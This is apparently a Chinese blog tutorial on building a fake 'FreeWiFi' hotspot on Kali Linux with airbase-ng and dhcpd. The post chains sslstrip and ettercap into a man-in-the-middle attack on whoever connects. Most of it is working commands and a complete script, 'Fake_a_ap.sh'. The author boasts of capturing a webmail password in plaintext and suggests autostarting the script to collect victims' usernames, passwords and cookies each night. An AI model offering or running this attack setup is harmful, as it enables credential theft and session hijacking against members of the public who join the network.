Kali-Linux下创建一个钓鱼WiFi热点

之前写过kali-linux下用 HostAPd+bridge-utils 搭建网桥的方式来创建wifi热点的日志,有兴趣可以在看下不同:

Kali-linux下使用HostAPd创建wifi热点(AP) - 简书

这里再介绍一种方法,是使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!

所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:

Aircrack-ng 套件#用来发送数据

isc-dhcp-server#简单的dhcp服务器

sslstrip#突破ssl加密

ettercap#嗅探劫持

leaf /etc/dhcp/dhcpd.conf编辑dhcp服务器配置文件,修改如下:

authoritative;

default-lease-time700;

max-lease-time8000;

subnet10.0.0.0netmask255.255.255.0{

option routers10.0.0.1;

option subnet-mask255.255.255.0;

option domain-name"FreeWiFi";

option domain-name-servers10.0.0.1;

range10.0.0.1010.0.0.100;

}

然后激活网卡至监听模式:

airmon-ng start wlan0

airbase-ng -e FreeWiFi -c 6 mon0

此时虚拟wifi的信号已经发送出去了,如果出现错误:

Error: Got channel -1, expected a value > 0.

执行如下命令:

airmon-ng stop mon0

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

然后从激活网卡至监听模式那里重新开始。

接着执行如下命令:

ifconfig at0 up

ifconfig at010.0.0.1netmask255.255.255.0

ifconfig at0 mtu1400

route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1

iptables--flush

iptables--table nat--flush

iptables--delete-chain

iptables--table nat--delete-chain

echo1>/proc/sys/net/ipv4/ip_forward

iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1

iptables-P FORWARD ACCEPT

iptables--append FORWARD--in-interfaceat0-j ACCEPT

iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE

iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000

dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:

sslstrip-fpk10000

ettercap-Tpuqiat0

然后就等着鱼儿上钩吧!

手机上测试了下,网易邮箱直接明文密码:

百度使用了加密:

写了一个脚本,修改成自己的设置每次执行就ok了:

复制下面代码,保存为 “Fake_a_ap.sh”,然后 chmod +x Fake_a_ap.sh && ./Fake_a_ap.sh

#!/bin/sh

echo "即将创建WiFi热点,请确保dhcpd.conf已经配置好!" &

sleep5

ifconfig wlan0 down#wlan0修改成你的网卡

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng start wlan0&

sleep5

airbase-ng-eFreeWiFi-c6mon0&#修改成自己的热点名称和信道

sleep5

ifconfig at0 up

ifconfig at010.0.0.1netmask255.255.255.0

ifconfig at0 mtu1400

route add-net10.0.0.0netmask255.255.255.0gw10.0.0.1

iptables--flush&&iptables--table nat--flush&&iptables--table nat--flush&&iptables--table nat--delete-chain&

echo1>/proc/sys/net/ipv4/ip_forward

iptables-t nat-A PREROUTING-p udp-j DNAT--to192.168.1.1

iptables-P FORWARD ACCEPT

iptables--append FORWARD--in-interfaceat0-j ACCEPT

iptables--table nat--append POSTROUTING--out-interfaceeth0-j MASQUERADE

iptables-t nat-A PREROUTING-p tcp--destination-port80-j REDIRECT--to-port10000

dhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pid at0

sleep2

/etc/init.d/isc-dhcp-server start&

sleep5

sslstrip-fpk10000&

ettercap-puTqi at0

当然还可以更加淫荡!简单Ettercap 使用进阶(1):详细参数:设置成将数据包保存到本地,然后再把这个脚本添加到“启动应用程序”里或者Kali-linux 定时执行任务Crontab的简单设置 - 简书,让它随系统启动,,,然后就没有然后了:每天睡觉前打开数据包检查下里面的username,passwd,cookie,,etc,,,,

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 1.安全技术 (1)入侵检测与管理系统(Intrusion Detection Systems): 特点是不阻断任...
    尛尛大尹阅读 7,261评论 0 2
  • 当搭建完openstack之后,在创建instance之前,第一件事情就是创建network,一个经典的流程如下:...
    ximitc阅读 4,921评论 0 0
  • 本文整理了在实践过程中使用的Linux网络工具,这些工具提供的功能非常强大,我们平时使用的只是冰山一角,比如lso...
    老夫刘某阅读 9,013评论 0 7
  • 防火墙的概念iptables的简介iptables命令网络防火墙NATfirewalld服务 一、防火墙的概念 (...
    哈喽别样阅读 5,831评论 0 1
  • 好久没给家里打电话,晚上给奶奶聊天,奶奶说:“有时间给你爸视频,劝他多注意身体,他最近又开始闹肚子了,我们说不管用...
    cherry8843阅读 2,900评论 4 1

友情链接更多精彩内容